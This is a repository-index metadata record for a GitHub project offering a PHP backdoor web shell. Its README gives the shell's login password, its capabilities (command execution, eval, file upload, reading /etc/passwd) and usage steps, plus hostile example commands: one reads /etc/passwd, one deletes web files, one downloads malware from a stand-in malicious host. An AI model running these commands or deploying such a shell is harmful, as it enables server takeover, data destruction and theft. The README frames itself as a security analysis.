{"id":26225485,"url":"https://github.com/rootshelll/rootkit-shell","last_synced_at":"2025-03-12T19:16:46.176Z","repository":{"id":282011258,"uuid":"947181223","full_name":"RootShelll/RootKit-Shell","owner":"RootShelll","description":"This article analyzes the PHP RootKit Backdoor, explaining its features like password-protected access, command execution, file management, and PHP code execution. Learn about the security risks associated with such scripts and how ethical hackers and security researchers study them to enhance web security.","archived":false,"fork":false,"pushed_at":"2025-03-12T10:10:44.000Z","size":113,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-12T10:34:56.467Z","etag":null,"topics":["ethical-hacking","eval-php","hacking","malicious-script","php-backdoor","php-shell","phph","rootkit-php","shell-exec","shell-script","unauthorized-access","web-security"],"latest_commit_sha":null,"homepage":"https://r00t-shell.com/php-rootkit-backdoor-features-security-risks/","language":"PHP","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RootShelll.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-12T09:30:04.000Z","updated_at":"2025-03-12T10:11:06.000Z","dependencies_parsed_at":"2025-03-12T10:34:59.220Z","dependency_job_id":"365633e1-3ad1-4692-bede-9de5e75cbe12","html_url":"https://github.com/RootShelll/RootKit-Shell","commit_stats":null,"previous_names":["rootshelll/rootkit-shell"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FRootKit-Shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FRootKit-Shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FRootKit-Shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RootShelll%2FRootKit-Shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RootShelll","download_url":"https://codeload.github.com/RootShelll/RootKit-Shell/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243277500,"owners_count":20265352,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["ethical-hacking","eval-php","hacking","malicious-script","php-backdoor","php-shell","phph","rootkit-php","shell-exec","shell-script","unauthorized-access","web-security"],"created_at":"2025-03-12T19:16:45.331Z","updated_at":"2025-03-12T19:16:46.171Z","avatar_url":"https://github.com/RootShelll.png","language":"PHP","readme":"### PHP RootKit Backdoor – Features \u0026 Security Risks\n![RootKit-Shell Backdoor](https://raw.githubusercontent.com/RootShelll/RootKit-Shell/refs/heads/main/RootKit%20(%20PHP%20Backdoor%20).png \"RootKit-Shell Backdoor\")\n## Password:\n```bash\nR00t\n```\n\n#### Overview\n\nThis PHP backdoor script provides full control over a web server once deployed. **It is a malicious tool** that allows unauthorized access and remote command execution.\n\n#### Features \u0026 Functions:\n\n- **Password-Protected Access:** Requires a predefined password for login.\n- **File Manager:** View, create, edit, and delete files.\n- **Command Execution:** Run system commands using `shell_exec()`.\n- **PHP Code Execution:** Execute arbitrary PHP scripts via `eval()`.\n- **File Upload:** Upload files to the server.\n- **Sensitive File Access:** Read system files like `/etc/passwd`.\n\n#### Usage (Theoretical)\n\nOnce uploaded to a server, this script can be accessed via a browser:\n\n1. Navigate to the script URL.\n2. Enter the password to gain access.\n3. Execute commands, manage files, and exploit the server.\n\n#### Example Commands:\n\n```bash\nls -la  # List directory contents\ncat /etc/passwd  # View system user accounts\nrm -rf /var/www/html/*  # Delete all web files (dangerous)\nwget http://malicious.com/malware.php -O /tmp/m.php  # Download a malicious script\nphp -r \"system('whoami');\"  # Check user permissions\n```\n\n#### Warning \u0026 Ethical Considerations\n\n**Using such scripts for unauthorized access is illegal.** Ethical hackers and security researchers analyze these abilities to strengthen web security. If found on a system, **remove it immediately** and implement stronger security measures.\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Frootkit-shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frootshelll%2Frootkit-shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frootshelll%2Frootkit-shell/lists"}